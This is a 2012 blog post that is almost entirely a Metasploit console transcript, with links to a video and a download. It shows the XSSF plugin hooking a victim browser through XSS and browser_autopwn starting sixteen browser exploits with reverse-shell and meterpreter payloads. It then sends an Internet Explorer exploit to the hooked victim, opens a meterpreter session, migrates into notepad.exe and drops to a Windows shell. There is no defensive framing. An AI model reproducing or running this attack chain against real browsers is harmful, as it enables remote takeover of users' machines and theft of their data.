Monday, January 9, 2012

Cross Site Scripting Framework (XSSF)

[Video] Cross Site Scripting Framework (XSSF)
Direct Link : http://download.netqurd.com/Bl4ckViper/Videos/xssf.rar
Online : http://youtu.be/ziPv-gTFNGM
Download XSSF Module : http://www.metasploit.com/redmine/attachments/596/XSSF.zip





msf > load xssf

__ __ ______ ______ ______
/\_\_\_\ /\ ___\ /\ ___\ /\ ___\
\/_/\_\/_ \ \___ \ \ \___ \ \ \ __\
/\_\/\_\ \/\_____\ \/\_____\ \ \_\
\/_/\/_/ \/_____/ \/_____/ \/_/ Cross-Site Scripting Framework
Ludovic Courgnaud - CONIX Security

[+] Server started : http://192.168.56.101:8888/

[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF
msf > xssf_victims

Victims
=======

id xssf_server_id active ip interval browser_name browser_version cookie
-- -------------- ------ -- -------- ------------ --------------- ------
1 1 true 192.168.56.1 2 Internet Explorer 6.0 YES

[*] Use xssf_information [VictimID] to see more information about a victim
msf > xssf_information 1

INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS : 192.168.56.1
ACTIVE : TRUE
FIRST REQUEST : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME : Internet Explorer
BROWSER VERSION : 6.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
COOKIES ? : YES
RUNNING ATTACK : NONE
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...

[*] --- Done, found 16 exploit modules

[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.
msf auxiliary(browser_autopwn) > jobs

Jobs
====

Id Name
-- ----
0 Auxiliary: server/browser_autopwn
1 Exploit: multi/browser/firefox_escape_retval
2 Exploit: multi/browser/java_calendar_deserialize
3 Exploit: multi/browser/java_trusted_chain
4 Exploit: multi/browser/mozilla_compareto
5 Exploit: multi/browser/mozilla_navigatorjava
6 Exploit: multi/browser/opera_configoverwrite
7 Exploit: multi/browser/opera_historysearch
8 Exploit: osx/browser/safari_metadata_archive
9 Exploit: windows/browser/apple_quicktime_marshaled_punk
10 Exploit: windows/browser/apple_quicktime_rtsp
11 Exploit: windows/browser/apple_quicktime_smil_debug
12 Exploit: windows/browser/ie_createobject
13 Exploit: windows/browser/ms03_020_ie_objecttype
14 Exploit: windows/browser/ms10_018_ie_behaviors
15 Exploit: windows/browser/ms10_xxx_ie_css_clip
16 Exploit: windows/browser/winzip_fileview
17 Exploit: multi/handler
18 Exploit: multi/handler
19 Exploit: multi/handler
msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...

[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)

^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB 192.168.56.101:3333 -> 192.168.56.1:37151

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C)Microsoft 1985-2001 Microsoft Corp.

C:\Documents and Settings\viper
Posted by at 3:19 PM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)